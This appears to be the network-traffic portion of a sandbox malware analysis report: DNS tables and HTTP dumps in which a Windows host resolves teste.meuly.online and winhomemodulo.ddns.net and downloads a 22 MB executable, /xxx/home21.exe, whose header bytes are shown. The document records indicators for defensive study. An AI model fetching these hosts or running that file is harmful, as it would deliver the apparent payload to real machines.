Jul 4, 2024 19:43:02.752096891 CEST	192.168.2.4	1.1.1.1	0x19a8	Standard query (0)	www.google.com.br	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:02.752288103 CEST	192.168.2.4	1.1.1.1	0x99de	Standard query (0)	www.google.com.br	65	IN (0x0001)	false
Jul 4, 2024 19:43:04.807410955 CEST	192.168.2.4	1.1.1.1	0x5038	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:04.807550907 CEST	192.168.2.4	1.1.1.1	0x55f	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jul 4, 2024 19:43:05.204117060 CEST	192.168.2.4	1.1.1.1	0xe7b7	Standard query (0)	www.google.com.br	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:05.204304934 CEST	192.168.2.4	1.1.1.1	0x783d	Standard query (0)	www.google.com.br	65	IN (0x0001)	false
Jul 4, 2024 19:43:06.272155046 CEST	192.168.2.4	1.1.1.1	0x2dbc	Standard query (0)	ogs.google.com.br	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:06.272319078 CEST	192.168.2.4	1.1.1.1	0x7a92	Standard query (0)	ogs.google.com.br	65	IN (0x0001)	false
Jul 4, 2024 19:43:06.721832991 CEST	192.168.2.4	1.1.1.1	0x9ad6	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:06.722132921 CEST	192.168.2.4	1.1.1.1	0x948b	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Jul 4, 2024 19:43:07.241863012 CEST	192.168.2.4	1.1.1.1	0x2a69	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:07.242140055 CEST	192.168.2.4	1.1.1.1	0x5233	Standard query (0)	play.google.com	65	IN (0x0001)	false
Jul 4, 2024 19:43:07.435726881 CEST	192.168.2.4	1.1.1.1	0x9486	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:07.435879946 CEST	192.168.2.4	1.1.1.1	0x7f2	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jul 4, 2024 19:43:08.189382076 CEST	192.168.2.4	1.1.1.1	0xc6a2	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:08.189517975 CEST	192.168.2.4	1.1.1.1	0xee0b	Standard query (0)	play.google.com	65	IN (0x0001)	false
Jul 4, 2024 19:43:08.409647942 CEST	192.168.2.4	1.1.1.1	0xe8f8	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:08.409811974 CEST	192.168.2.4	1.1.1.1	0xfe74	Standard query (0)	www.google.com	65	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 4, 2024 19:39:58.759068966 CEST	1.1.1.1	192.168.2.4	0x4d0c	No error (0)	teste.meuly.online		23.111.168.85	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:01.078962088 CEST	1.1.1.1	192.168.2.4	0x2fb5	No error (0)	winhomemodulo.ddns.net		64.226.97.61	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:01.766266108 CEST	1.1.1.1	192.168.2.4	0x36e7	No error (0)	google.com.br		142.250.185.227	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:02.759545088 CEST	1.1.1.1	192.168.2.4	0x19a8	No error (0)	www.google.com.br		142.250.185.99	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:02.761420965 CEST	1.1.1.1	192.168.2.4	0x99de	No error (0)	www.google.com.br			65	IN (0x0001)	false
Jul 4, 2024 19:43:04.814224958 CEST	1.1.1.1	192.168.2.4	0x55f	No error (0)	www.google.com			65	IN (0x0001)	false
Jul 4, 2024 19:43:04.814304113 CEST	1.1.1.1	192.168.2.4	0x5038	No error (0)	www.google.com		142.250.74.196	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:05.211946011 CEST	1.1.1.1	192.168.2.4	0x783d	No error (0)	www.google.com.br			65	IN (0x0001)	false
Jul 4, 2024 19:43:05.212210894 CEST	1.1.1.1	192.168.2.4	0xe7b7	No error (0)	www.google.com.br		216.58.206.67	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:06.305269003 CEST	1.1.1.1	192.168.2.4	0x7a92	No error (0)	ogs.google.com.br	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 4, 2024 19:43:06.321549892 CEST	1.1.1.1	192.168.2.4	0x2dbc	No error (0)	ogs.google.com.br	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 4, 2024 19:43:06.321549892 CEST	1.1.1.1	192.168.2.4	0x2dbc	No error (0)	www3.l.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:06.729301929 CEST	1.1.1.1	192.168.2.4	0x9ad6	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 4, 2024 19:43:06.729301929 CEST	1.1.1.1	192.168.2.4	0x9ad6	No error (0)	plus.l.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:06.732065916 CEST	1.1.1.1	192.168.2.4	0x948b	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 4, 2024 19:43:07.257476091 CEST	1.1.1.1	192.168.2.4	0x2a69	No error (0)	play.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:07.444000006 CEST	1.1.1.1	192.168.2.4	0x9486	No error (0)	www.google.com		142.250.185.196	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:07.444756985 CEST	1.1.1.1	192.168.2.4	0x7f2	No error (0)	www.google.com			65	IN (0x0001)	false
Jul 4, 2024 19:43:08.196274042 CEST	1.1.1.1	192.168.2.4	0xc6a2	No error (0)	play.google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:08.416451931 CEST	1.1.1.1	192.168.2.4	0xe8f8	No error (0)	www.google.com		142.250.186.68	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:08.417562962 CEST	1.1.1.1	192.168.2.4	0xfe74	No error (0)	www.google.com			65	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 19:43:01.088016987 CEST	440	OUT	GET /w2/ HTTP/1.1 Host: winhomemodulo.ddns.net Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jul 4, 2024 19:43:01.750849962 CEST	239	IN	HTTP/1.1 302 Found Date: Thu, 04 Jul 2024 17:43:01 GMT Server: Apache/2.4.58 (Ubuntu) Location: https://google.com.br Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:39:50 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-07-04 17:39:50 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-04 17:39:50 UTC	654	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 04 Jul 2024 17:38:50 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30275.14 Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C514_BAY x-ms-request-id: c86ef039-b4e3-4977-9607-84533409e1cf PPServer: PPV: 30 H: PH1PEPF00011D78 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 04 Jul 2024 17:39:49 GMT Connection: close Content-Length: 11390
2024-07-04 17:39:50 UTC	11390	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:39:51 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-07-04 17:39:51 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-04 17:39:51 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 04 Jul 2024 17:38:51 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C533_BAY x-ms-request-id: 6792163d-d47a-430b-a48c-87869c731767 PPServer: PPV: 30 H: PH1PEPF00011FCE V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 04 Jul 2024 17:39:50 GMT Connection: close Content-Length: 1919
2024-07-04 17:39:51 UTC	1919	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:39:52 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-07-04 17:39:52 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-04 17:39:53 UTC	654	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 04 Jul 2024 17:38:52 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30275.14 Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C514_BAY x-ms-request-id: 9528014c-2a59-4678-9ff1-d1a7db8e9596 PPServer: PPV: 30 H: PH1PEPF00011D6F V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 04 Jul 2024 17:39:53 GMT Connection: close Content-Length: 11370
2024-07-04 17:39:53 UTC	11370	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:39:54 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-07-04 17:39:54 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-04 17:39:54 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 04 Jul 2024 17:38:54 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C514_BAY x-ms-request-id: 5f4866fa-e5ad-4349-886d-409a29c490dc PPServer: PPV: 30 H: PH1PEPF000183C6 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 04 Jul 2024 17:39:54 GMT Connection: close Content-Length: 11370
2024-07-04 17:39:54 UTC	11370	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:39:59 UTC	82	OUT	GET /xxx/home21.exe HTTP/1.1 Host: teste.meuly.online Connection: Keep-Alive
2024-07-04 17:39:59 UTC	228	IN	HTTP/1.1 200 OK Connection: close content-type: application/x-msdownload last-modified: Thu, 04 Jul 2024 14:54:57 GMT accept-ranges: bytes content-length: 22286864 date: Thu, 04 Jul 2024 17:40:00 GMT server: LiteSpeed
2024-07-04 17:39:59 UTC	16384	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-07-04 17:39:59 UTC	16384	IN	Data Raw: 45 93 69 aa 1a ee 70 ce e7 7e 59 ca c2 8b 07 e8 c1 11 19 18 9d 04 ef c9 29 f7 03 f8 d2 d8 01 61 ae 86 4c 98 02 c2 19 ae 16 b8 eb 26 9a d7 e6 e1 d6 d3 82 fd 4d d8 1e aa 69 8b 73 23 fe 7f 4a 3f 1a 8a 36 55 d1 86 64 14 3a b4 04 a6 1e 77 ed e1 f8 8d ee ac df fa 75 57 14 d9 b1 8b 04 bc a9 5c fa 7a 6f 99 b6 bc c8 d0 c3 50 a5 ef c1 bd cb b2 13 6f b6 62 d4 0f a4 57 3f a4 23 a1 05 96 90 57 c0 84 eb 52 77 03 74 5b f4 50 72 ca 45 92 42 fe 44 4d ea bc cd 57 87 1e a5 55 6a ab 3e 75 ac c2 eb b6 c1 96 ed 71 a4 4d ed 76 d0 f8 b9 b2 60 a6 c2 b0 86 9b c8 58 47 19 cf 1b b4 37 e2 97 19 7c f8 61 96 32 55 1b 1d d9 61 68 04 f4 49 97 57 51 83 e1 5a 5e 72 3c ac ab 18 8b f2 1d 65 8a 32 9e 42 6e 8d ac 8d bc a9 e5 21 08 f1 95 63 34 d2 b6 7f b2 e0 e5 f8 ea 33 be 32 72 3e 86 56 eb 31 Data Ascii: Eip~Y)aL&Mis#J?6Ud:wuW\zoPobW?#WRwt[PrEBDMWUj>uqMv`XG7\|a2UahIWQZ^r<e2Bn!c432r>V1
2024-07-04 17:39:59 UTC	16384	IN	Data Raw: 68 9b 20 ee ce 70 21 5a 30 89 d7 0e 9c d5 e5 5f 75 be 04 70 b7 55 5b 54 14 a3 07 ba 99 93 5d fc 42 8b cb bd d1 db b7 51 4f 22 98 87 e7 00 44 ea 14 39 1c ed 10 31 e7 56 60 c9 df aa 87 d3 41 eb c7 c9 95 0c 0a 2a 14 10 9d e2 e8 ff bb f5 e4 bd b5 a9 49 32 d1 a4 0b 1b ce 98 81 0c ca 97 2e 99 9c 94 48 e2 13 1f 54 b9 fa f0 99 b1 62 21 c7 ee 22 04 df 28 02 bf 82 8e eb 34 c5 e8 5e 87 25 8e 63 55 c9 9a fe 3c 29 25 a8 2e 19 91 6c ed c0 46 2a 7b 2b 27 d1 e9 37 9e 76 31 00 89 67 d8 2e 0f b3 1b 71 d7 ab 10 dc ee 8e 10 c9 03 6c 0a 09 e7 ca dc e2 45 e9 ca fe 46 15 e3 2f 7f cf 50 2f e4 76 cc 57 ab a8 97 62 b9 f3 0a 85 89 74 b1 95 6b 60 38 b1 f6 a7 74 b4 ac d6 7a b2 e0 99 9c 07 cc 42 51 73 9b fe a6 ec 38 41 be 9e 2d d3 a7 ff 29 9a 87 25 25 0e bd f8 a6 45 69 54 2c 85 7d b9 Data Ascii: h p!Z0_upU[T]BQO"D91V`AI2.HTb!"(4^%cU<)%.lF{+'7v1g.qlEF/P/vWbtk`8tzBQs8A-)%%EiT,}
